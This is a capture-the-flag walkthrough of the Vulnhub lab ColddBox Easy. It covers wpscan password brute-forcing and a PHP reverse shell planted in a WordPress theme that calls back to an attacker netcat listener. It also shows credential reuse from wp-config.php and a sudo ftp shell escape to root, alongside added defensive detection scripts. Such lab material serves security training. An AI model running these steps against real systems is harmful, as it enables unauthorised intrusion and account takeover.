
Walkthrough Coldbox Easy (Vulnhub)

Mochamad Jazuly
Cybersecurity Analyst

Methodology

  1. Network Scanning
  2. Enumeration / Reconnaissance
  3. Uploading a Reverse Shell
  4. Privilege Escalation

1. Network Scanning

Kali IP: 192.168.11.112

  • Find the target's IP.
netdiscover -r 192.168.11.111

  • Confirm the target by checking its web page with whatweb.
whatweb 192.168.11.110

2. Enumeration / Reconnaissance

  • Scan all ports with nmap.
nmap -p- -A -v 192.168.11.110

Result:

Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-25 10:54 WIB
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Initiating ARP Ping Scan at 10:54
Scanning 192.168.11.110 [1 port]
Completed ARP Ping Scan at 10:54, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:54
Completed Parallel DNS resolution of 1 host. at 10:54, 0.20s elapsed
Initiating SYN Stealth Scan at 10:54
Scanning 192.168.11.110 [65535 ports]
Discovered open port 80/tcp on 192.168.11.110
Discovered open port 4512/tcp on 192.168.11.110
Completed SYN Stealth Scan at 10:54, 1.28s elapsed (65535 total ports)
Initiating Service scan at 10:54
Scanning 2 services on 192.168.11.110
Completed Service scan at 10:54, 6.05s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.11.110
NSE: Script scanning 192.168.11.110.
Initiating NSE at 10:54
Completed NSE at 10:54, 0.38s elapsed
Initiating NSE at 10:54
Completed NSE at 10:54, 0.02s elapsed
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Nmap scan report for 192.168.11.110
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
|_http-title: ColddBox | One more machine
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
4512/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA)
| 256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA)
|_ 256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519)
MAC Address: 08:00:27:7F:58:71 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.014 days (since Tue Jan 25 10:34:12 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.49 ms 192.168.11.110

NSE: Script Post-scanning.
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.91 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)
  • From the nmap output above we get the following information:
port : 80/tcp | service : http | version : Apache httpd 2.4.18
port : 4512/tcp | service : ssh | version : OpenSSH 7.2p2
  • We will explore port 80 first by opening the web page in a browser.
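The summary above was written by hand from the nmap report. The following Python script is an added example (not part of the original walkthrough) that extracts the same facts from the text of a normal nmap run: it keeps only the lines for open ports and also flags a service that sits on a non-default port, such as the SSH daemon on 4512 here. The sample input is a constructed fragment modelled on the report above, and the default-port table is an assumption of this example.

```python
import re

# Constructed sample: the port lines from the nmap report above, plus one
# filtered port to show that only "open" lines are kept.
SAMPLE_NMAP = """\
PORT      STATE    SERVICE VERSION
80/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
4512/tcp  open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
9999/tcp  filtered unknown
"""

# A port line looks like "<port>/<proto> <state> <service> [version text]".
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)

# Assumed table of where these services normally listen (example only).
DEFAULT_PORTS = {"http": 80, "https": 443, "ssh": 22, "ftp": 21}


def parse_open_ports(text):
    """Return one dict per line that describes an open port."""
    found = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m or m.group("state") != "open":
            continue
        found.append({
            "port": int(m.group("port")),
            "proto": m.group("proto"),
            "service": m.group("service"),
            "version": (m.group("version") or "").strip(),
        })
    return found


def summarize(text):
    """Format the findings the way the walkthrough lists them."""
    return [
        f"port : {p['port']}/{p['proto']} | service : {p['service']} | version : {p['version']}"
        for p in parse_open_ports(text)
    ]


def nonstandard_ports(text):
    """Known services listening somewhere other than their usual port.
    A full -p- scan finds them anyway, so a moved port is not a control."""
    return [
        p for p in parse_open_ports(text)
        if p["service"] in DEFAULT_PORTS and DEFAULT_PORTS[p["service"]] != p["port"]
    ]


if __name__ == "__main__":
    for line in summarize(SAMPLE_NMAP):
        print(line)
    for p in nonstandard_ports(SAMPLE_NMAP):
        print(f"note: {p['service']} on non-default port {p['port']}")
```

Feed it the saved output of `nmap -p- -A -v <host>` instead of the sample to get the same two-line summary for a real scan.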

  • Clicking Login brings up a login page like the one of the WordPress CMS.

  • Since the target is known to run WordPress, we will explore it with the wpscan tool.

wpscan --url 192.168.11.110 --enumerate u

Result:

_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.11.110/ [192.168.11.110]
[+] Started: Tue Jan 25 11:25:01 2022

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.11.110/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.11.110/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.11.110/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.11.110/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
| - http://192.168.11.110/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>

[+] WordPress theme in use: twentyfifteen
| Location: http://192.168.11.110/wp-content/themes/twentyfifteen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://192.168.11.110/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://192.168.11.110/wp-content/themes/twentyfifteen/style.css?ver=4.1.31
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.11.110/wp-content/themes/twentyfifteen/style.css?ver=4.1.31, Match: 'Version: 1.0'

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=====================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] the cold in person
| Found By: Rss Generator (Passive Detection)

[+] hugo
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] c0ldd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] philip
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jan 25 11:25:03 2022
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 14.57 KB
[+] Data Received: 264.837 KB
[+] Memory used: 181.254 MB
[+] Elapsed time: 00:00:02
  • We get several possible usernames, among them hugo, c0ldd and philip.
  • We will explore further using the username c0ldd.
wpscan --url 192.168.11.110 --usernames c0ldd --passwords /usr/share/wordlists/rockyou.txt  

Result:

_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.11.110/ [192.168.11.110]
[+] Started: Tue Jan 25 11:29:53 2022

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.11.110/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.11.110/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.11.110/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.11.110/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
| - http://192.168.11.110/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>

[+] WordPress theme in use: twentyfifteen
| Location: http://192.168.11.110/wp-content/themes/twentyfifteen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://192.168.11.110/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://192.168.11.110/wp-content/themes/twentyfifteen/style.css?ver=4.1.31
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.11.110/wp-content/themes/twentyfifteen/style.css?ver=4.1.31, Match: 'Version: 1.0'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <====================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - c0ldd / 9876543210
Trying c0ldd / bigdaddy Time: 00:00:11 < > (1225 / 14345617) 0.00% ETA: ??:??:??

[!] Valid Combinations Found:
| Username: c0ldd, Password: 9876543210

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jan 25 11:30:09 2022
[+] Requests Done: 1366
[+] Cached Requests: 36
[+] Data Sent: 445.834 KB
[+] Data Received: 4.514 MB
[+] Memory used: 239.105 MB
[+] Elapsed time: 00:00:16
  • From this we know there is an account c0ldd:9876543210.
  • Log in to WordPress with the account c0ldd:9876543210.
  • This lands us in the admin dashboard.
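The password attack above sent 1366 requests to the login page in 16 seconds, which is exactly the pattern a web server log makes visible. The Python script below is an added example (not from the original walkthrough) that reads Apache combined-format access log lines, counts POSTs to wp-login.php and xmlrpc.php per source address inside a sliding time window, and reports sources that exceed a threshold. The log lines are constructed for the example; the threshold and window are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-log lines (not real traffic): a burst of 300
# login POSTs from one address, next to ordinary traffic from another client.
SAMPLE_LOG = "\n".join(
    [
        f'192.168.11.111 - - [25/Jan/2022:11:29:{53 + i // 100:02d} +0700] '
        f'"POST /wp-login.php HTTP/1.1" 200 3547 "-" "WPScan v3.8.20"'
        for i in range(300)
    ]
    + [
        '192.168.11.50 - - [25/Jan/2022:11:30:01 +0700] "GET /?p=1 HTTP/1.1" 200 9712 "-" "Mozilla/5.0"',
        '192.168.11.50 - - [25/Jan/2022:11:30:05 +0700] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    ]
)

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Both endpoints accept credentials; wpscan's report lists xmlrpc.php as enabled.
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")


def login_attempts(text):
    """Map source IP -> list of timestamps of credential-bearing POSTs."""
    per_ip = defaultdict(list)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        if not m.group("path").startswith(LOGIN_PATHS):
            continue
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        per_ip[m.group("ip")].append(ts)
    return per_ip


def detect_bruteforce(text, threshold=20, window_seconds=60):
    """Return {ip: peak attempts in any window} for sources over the threshold.
    Assumed defaults: 20 login POSTs inside 60 seconds is treated as an attack."""
    alerts = {}
    window = timedelta(seconds=window_seconds)
    for ip, stamps in login_attempts(text).items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            # slide the window start forward until it fits within window_seconds
            while ts - stamps[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[ip] = max(alerts.get(ip, 0), count)
    return alerts


if __name__ == "__main__":
    for ip, peak in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {peak} login attempts within 60s")
```

Run it over `/var/log/apache2/access.log` (combined format) to see the same burst that wpscan produces; the single legitimate login from the second address stays below the threshold.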

3. Uploading a Reverse Shell

  • Upload a reverse shell through the file header.php (menu Appearance -> Editor -> Header (header.php)).
  • We will use the php-reverse-shell by pentestmonkey.
  • Replace the contents of header.php with the php-reverse-shell.
  • The IP line (line 49) and port line (line 50) need adjusting, then save/update the file.
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS

becomes:

$ip = '192.168.11.111'; // change to the attacker/Kali IP
$port = 4545; // change the port as needed
  • In the Kali terminal, use netcat to listen on port 4545.
nc -lvp 4545
  • Now we just wait for the connection; to trigger it we need to open the target's IP address in the browser.
nc -lvp 4545
listening on [any] 4545 ...
192.168.11.110: inverse host lookup failed: Unknown host
connect to [192.168.11.111] from (UNKNOWN) [192.168.11.110] 43064
Linux ColddBox-Easy 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
06:04:15 up 1:35, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
  • Yes, we are in. Now spawn a Python pty shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
  • Explore the file wp-config.php.
cd /var/www/html/

more wp-config.php
  • From here we learn some information, including:
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'colddbox');

/** MySQL database username */
define('DB_USER', 'c0ldd');
/** MySQL database password */
define('DB_PASSWORD', 'cybersecurity');
  • Try logging in to the system with the account c0ldd:cybersecurity.
su c0ldd
  • Now we are logged in as c0ldd -> c0ldd@ColddBox-Easy:/var/www/html$
  • From here we will try to escalate to root. First, look for flag-1 in the home directory.
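Two of the weaknesses used so far live in wp-config.php: the dashboard file editor that accepted the reverse shell is left enabled (WordPress turns it off when the constant DISALLOW_FILE_EDIT is set to true), and the database user c0ldd is also a local shell account with the same password. The Python script below is an added example (not from the original walkthrough) that parses the define() constants out of a wp-config.php, reports a missing DISALLOW_FILE_EDIT, and flags a DB_USER that also appears as a login-capable account in /etc/passwd so that password reuse can be checked. Both inputs are constructed samples modelled on what the walkthrough shows.

```python
import re

# Constructed wp-config.php fragment modelled on the one shown above (a sample,
# not the machine's real file).
SAMPLE_WP_CONFIG = """\
<?php
define('DB_NAME', 'colddbox');
define('DB_USER', 'c0ldd');
define('DB_PASSWORD', 'cybersecurity');
define('DB_HOST', 'localhost');
define( "WP_DEBUG", false );
"""

# Same file with the file editor disabled (the recommended setting).
HARDENED_WP_CONFIG = SAMPLE_WP_CONFIG + "define('DISALLOW_FILE_EDIT', true);\n"

# Constructed /etc/passwd lines for the shared-account check.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
c0ldd:x:1000:1000:c0ldd:/home/c0ldd:/bin/bash
"""

# Matches define('NAME', 'string') / define("NAME", true|false|123).
DEFINE_RE = re.compile(
    r"""define\(\s*['"](?P<name>[A-Z_0-9]+)['"]\s*,\s*"""
    r"""(?P<value>'[^']*'|"[^"]*"|true|false|\d+)\s*\)""",
    re.IGNORECASE,
)


def parse_defines(text):
    """Return {CONSTANT: python value} for every define() call in the file."""
    consts = {}
    for m in DEFINE_RE.finditer(text):
        raw = m.group("value")
        if raw.lower() == "true":
            val = True
        elif raw.lower() == "false":
            val = False
        elif raw.isdigit():
            val = int(raw)
        else:
            val = raw[1:-1]  # strip the quotes
        consts[m.group("name")] = val
    return consts


def shell_users(passwd_text):
    """Account names whose login shell is not nologin/false."""
    users = set()
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) >= 7 and not parts[6].endswith(("nologin", "false")):
            users.add(parts[0])
    return users


def audit(wp_config_text, passwd_text):
    """List the findings a reviewer would raise for this pair of files."""
    consts = parse_defines(wp_config_text)
    findings = []
    if consts.get("DISALLOW_FILE_EDIT") is not True:
        findings.append("DISALLOW_FILE_EDIT is not true: the dashboard theme/plugin "
                        "editor can write PHP into the web root")
    if consts.get("DB_USER") in shell_users(passwd_text):
        findings.append(f"DB_USER {consts['DB_USER']!r} is also a local shell account: "
                        "verify the database and system passwords differ")
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_WP_CONFIG, SAMPLE_PASSWD):
        print("finding:", f)
```

On a real host, point it at /var/www/html/wp-config.php and /etc/passwd; the hardened sample shows that adding the single DISALLOW_FILE_EDIT line removes the first finding, while the shared account still needs a separate database user or a distinct password.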
cd
ls
cat user.txt
  • We get the file user.txt with the content RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==. This looks like base64 encoding, so we try decoding it.
echo "RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==" | base64 -d
  • We get the sentence "Felicidades, primer nivel conseguido!", which means "Congratulations, first level achieved!"

4. Privilege Escalation

  • List the binaries that this user may run as root.
sudo -l

Result:

Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
(root) /usr/bin/vim
(root) /bin/chmod
(root) /usr/bin/ftp
c0ldd@ColddBox-Easy:~$
  • Now we use GTFOBins to exploit the binaries above. We will try ftp. You can read about it here.
sudo ftp
ftp> !/bin/sh
whoami
python3 -c 'import pty;pty.spawn("/bin/bash")'
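The sudo rules above are the whole privilege-escalation path: each of the three binaries is a known shell escape or arbitrary file-permission change when run as root. The Python script below is an added example (not from the original walkthrough) of the check a system administrator would run over `sudo -l` output to catch such rules before an attacker does. It parses the `(user) /path` lines regardless of the locale text around them and flags the three binaries named in the walkthrough; the list is an assumption of this example and deliberately short, GTFOBins is the full reference.

```python
import re

# Constructed copy of the sudo -l output shown above (Spanish locale text is
# irrelevant to the parser, only the "(runas) /path" lines matter).
SAMPLE_SUDO_L = """\
Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
"""

# "(root) NOPASSWD: /usr/bin/foo args" -> runas, optional NOPASSWD, command, args
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<nopasswd>NOPASSWD:\s*)?(?P<cmd>\S+)(?P<args>.*)$"
)

# Assumed watch-list (example only): the binaries found on this machine and why
# a root sudo entry for them is equivalent to root. GTFOBins lists many more.
SHELL_ESCAPES = {
    "vim": "editor with a built-in shell escape",
    "ftp": "client with a built-in shell escape",
    "chmod": "changes permission bits of any file as root",
}


def parse_sudo_rules(text):
    """Extract the command entries from `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append({
                "runas": m.group("runas").strip(),
                "nopasswd": bool(m.group("nopasswd")),
                "cmd": m.group("cmd"),
                "args": m.group("args").strip(),
            })
    return rules


def risky_sudo_rules(text):
    """Return (command, reason) for rules that amount to a root shell."""
    risky = []
    for rule in parse_sudo_rules(text):
        name = rule["cmd"].rsplit("/", 1)[-1]
        if rule["cmd"] == "ALL":
            risky.append((rule["cmd"], "unrestricted command"))
        elif name in SHELL_ESCAPES:
            risky.append((rule["cmd"], SHELL_ESCAPES[name]))
    return risky


if __name__ == "__main__":
    for cmd, reason in risky_sudo_rules(SAMPLE_SUDO_L):
        print(f"RISK {cmd}: {reason}")
```

The fix on the machine side is the usual one: grant a narrowly scoped wrapper script instead of an interactive editor or network client, and never hand out chmod as root.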
  • Now we have root access; next, look for flag-2 in root's home directory.
cd /root/
ls
cat root.txt
echo "wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=" | base64 -d
  • The content of root.txt -> ¡Felicidades, máquina completada!, which means "Congratulations, machine completed!"

Reference: infosecwriteups.com

